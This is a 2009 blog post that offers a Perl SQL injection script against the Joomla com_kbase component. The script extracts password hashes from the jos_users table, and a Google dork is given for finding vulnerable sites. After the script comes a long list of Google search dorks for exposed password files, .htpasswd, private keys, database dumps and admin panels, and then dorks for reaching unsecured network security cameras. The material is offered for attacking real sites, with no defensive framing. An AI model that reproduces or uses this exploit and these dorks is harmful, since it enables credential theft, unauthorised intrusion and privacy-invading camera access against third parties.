Sabtu, 07 Februari 2009

SQL Injection Script

#Joomla Remote SQL Injection ScriptBy XShimeX
#Dork: inurl:index.php?option=com_kbase
#Contact: slientro[AT]yahoo.com.my (Replace [AT] with @)

use IO::Socket::INET;
use LWP::UserAgent;
print "[*] Joomla Remote SQL Injection Script By XShimeX\n";
print "[*] Dork: inurl:index.php?option=com_kbase\n";
print "[*] Example: http://target.com/joomla\n";
print "[*] Enter The Target: ";
chomp (my $target=);

$t = LWP::UserAgent->new() or die "Browser Failed\n";
$t->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

if (!$target){
print "[*] Please enter the target ;p\n";
system('exit');
}else {
$password = "password";
$table = "jos_users";

print "[*] Start attack for ".$target." !\n";
$inject = $target ."/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(".$password."),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$table."--";
$request = $t->request(HTTP::Request->new(GET=>$inject));
$answer = $request->content;

if ($answer =~/([0-9a-fA-F]{32})/){
print "[*] Password Hash : $1\n";
print "[*] Attack success ;p";
}else{
print "[*] Attack Failed\n";
}
}

inurl:Index of

inurl:index.of.password
Directory listing contains password file(s)?
intitle:"Index of" service.pwd
Directory listing contains service.pwd file(s)
intitle:"Index of" view-source
Directory listing contains view-source file(s)
intitle:"Index of" admin
Direcory listing contains administrative files or directories
intitle:"Index of" .htpasswd
Directory listing contains .htpasswd file!
intitle:"Index of" log.txt
Directory listing contians log text files
intitle:"Index of" stats.html
Directory listing contains stats.html which may contain useful web server statistics
"access denied for user" "using password"
Web page contains error message which might provide useful application information
"A syntax error has occurred" filetype:ihtml
Web page contains error message which might provide useful application information
"ORA-00921: unexpected end of SQL command"
Web page contains error message which might provide useful application information
inurl:passlist.txt
The passlist.txt file may contain user passwords
"Index of /backup"
Directory may contain sensitive backup files
intitle:"Index of" .bash_history
Directory listing contains bash history information
intitle:"Index of" index.html.bak
Directory listing contains backup index file (index.html.bak)
intitle:"Index of" index.php.bak
Directory listing contains backup index file (index.html.bak)
intitle:"Index of" guestbook.cgi
Directory listing contains backup index file (index.html.bak)
intitle"Test Page for Apache"
Default test page for Apache
intitle:index.of.etc
Directory listing of /etc ?
filetype:xls username password
XLS spreadseet containing usernames and passwords?
"This file was generated by Nessus"
Nessus report!
intitle:"Index of" secring.bak
Secret key file
intitle:"Terminal Services Web Connection"
Access terminal services!
intitle:"Remote Desktop Web Connection"
Access Remote Desktop!
intitle:"Index of" access_log
Directory listing contains access_log file which may store sensitive information
intitle:"Index of" finance.xls
Directory listing contains finance.xls which may contain sensitive information
intitle:"Usage Statistics for"
Statistical information may contain sensitive data
intitle:"Index of" WSFTP.LOG
WSFTP.LOG file contains information about FTP transactions
intitle:"Index of" ws_ftp.ini
The ws_ftp.ini file may contain usernames and passwords of FTP users
"not for distribution" confidential
URL may contain confidential or sensitive information
"phpMyAdmin" "running on" inurl:"main.php"
phpMyAdmin allows remote mysql database administration
"#mysql dump" filetype:sql
mysql database dumps
"This summary was generated by wwwstat"
Database statistics
"Host Vulnerability Summary Report"
Vulnerability report!
"Network Vulnerability Assessment Report"
Vulnerability report!
inurl:php.ini filetype:ini
The php.ini file may contain sensitive PHP environment details.
BEGIN (CERTIFICATE|DSA|RSA) filetype:key
Private key(s)!
BEGIN (CERTIFICATE|DSA|RSA) filetype:csr
Private key(s)!
BEGIN (CERTIFICATE|DSA|RSA) filetype:crt
Private key(s)!
intitle:"Index of" passwd passwd.bak
passwd file!
intitle:"Index of" master.passwd
master.passwd file!
intitle:"Index of" pwd.db
pwd.db file may contain password information
intitle:"Index of..etc" passwd
passwd file!
filetype:cfg ks intext:rootpw -sample -test -howto
This file may contain the root password (encrypted)
intitle:"index.of.personal"
Directory may contain sensitive information
intitle:"Index of" login.jsp
The login.jsp file may contain database username or password information
intitle:"Index of" logfile
Directory may contain sensitive log files
filetype:php inurl:"viewfile" -"index.php" -"idfil
File may contain PHP source code
allinurl:intranet admin
Page may contain sensitive information
"supplied argument is not a valid MySQL result resource"
mysql error message may reveal sensitive information
"Error Diagnostic Information" intitle:"Error Occurred While"
Error message may reveal sensitive information
HTTP_USER_AGENT=Googlebot
Page may contain sensitive environment details

Google hack

Search GOOGLE:

allintitle: "Network Camera NetworkCamera" Network cameras
intitle:Axis 2400 video server Mostly security cameras, car parks, colleges, clubs, bars, etc.
intitle:axis intitle:"video server" Mostly security cameras, car parks, colleges, bars, ski slopes etc.<
intitle:"EvoCam" inurl:"webcam.html" Mostly European security cameras
intitle:"Live NetSnap Cam-Server feed" Network cameras, private and non private web cameras
intitle:"Live View / - AXIS" Mostly security cameras, car parks, colleges etc.
intitle:"LiveView / - AXIS" | inurl:view/view.shtml Mostly security cameras, car parks, colleges etc.
intitle:liveapplet Mostly security cameras, car parks, colleges, clubs, bars etc.
intitle:snc-cs3 inurl:home/ Mostly security cameras, swimming pools and more etc.
intitle:"snc-rz30 home" Mostly security cameras, shops, car parks
intitle:snc-z20 inurl:home/ Mostly security cameras, swimming pools and more etc.
intitle:"WJ-NT104 Main" Mostly security cameras, shops, car parks
inurl:LvAppl intitle:liveapplet Mostly security cameras, car parks, colleges etc.
inurl:indexFrame.shtml "Axis Video Server" Mostly security cameras, car parks, colleges etc.
inurl:lvappl A huge list of webcams around the world, mostly security cameras, car parks, colleges etc.
inurl:axis-cgi/jpg Mostly security cameras
inurl:indexFrame.shtml Axis Mostly security cameras, car parks, colleges etc.
inurl:"MultiCameraFrame?Mode=Motion" Mostly security cameras, pet shops, colleges etc.
inurl:/view.shtml Mostly security cameras, car parks, colleges etc.
inurl:/view/index.shtml Mostly security cameras, airports, car parks, back gardens, traffic cams etc.
inurl:viewerframe?mode= Network cameras, mostly private webcams etc.
inurl:"viewerframe?mode=motion" Network cameras
inurl:ViewerFrame?Mode=Refresh Mostly security cameras, parks, bird tables etc.

Other searches:

control/userimage.html
liveapplet
inurl:indexframe.shtml
inurl:"view/index.shtml"
inurl:"view/indexFrame.shtml"
inurl:view/view.shtml
inurl:/view/view.shtml?videos=
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Motion
inurl:ViewerFrame?Mode=Refresh
site:.viewnetcam.com -www.viewnetcam.com
/view/index.shtml

InTitle:

intitle:"live view" intitle:axis
intitle:"EvoCam" inurl:"webcam.html"
intitle:"i-Catcher Console - Web Monitor"
intitle:"Live NetSnap Cam-Server feed"
allintitle:liveapplet
intitle:liveapplet
intitle:"netcam live image"
intitle:"snc-rz30 home"
intitle:"WJ-NT104 Main"

InURL:

inurl:axis-cgi/jpg
inurl:indexFrame.shtml Axis
inurl:indexFrame.shtml "Axis Video Server"
inurl:lvappl live webcams
inurl:LvAppl intitle:liveapplet
inurl:"MultiCameraFrame?Mode=Motion"
inurl:/view:shtml
inurl:/view/index.shtml
inurl:view/indexframe.shtml
inurl:view/view.shtml
viewerframe?mode=
inurl:"viewerframe?mode=motion"
inurl:ViewerFrame?Mode=Refresh

searches in one order:

intitle:"live view" intitle:axis (two searches in one order)
intitle:axis intitle:"video server"
intitle:liveapplet inurl:LvAppl
intitle:"Live View / - AXIS" , inurl:view/view.shtml
intitle:start inurl:cgistart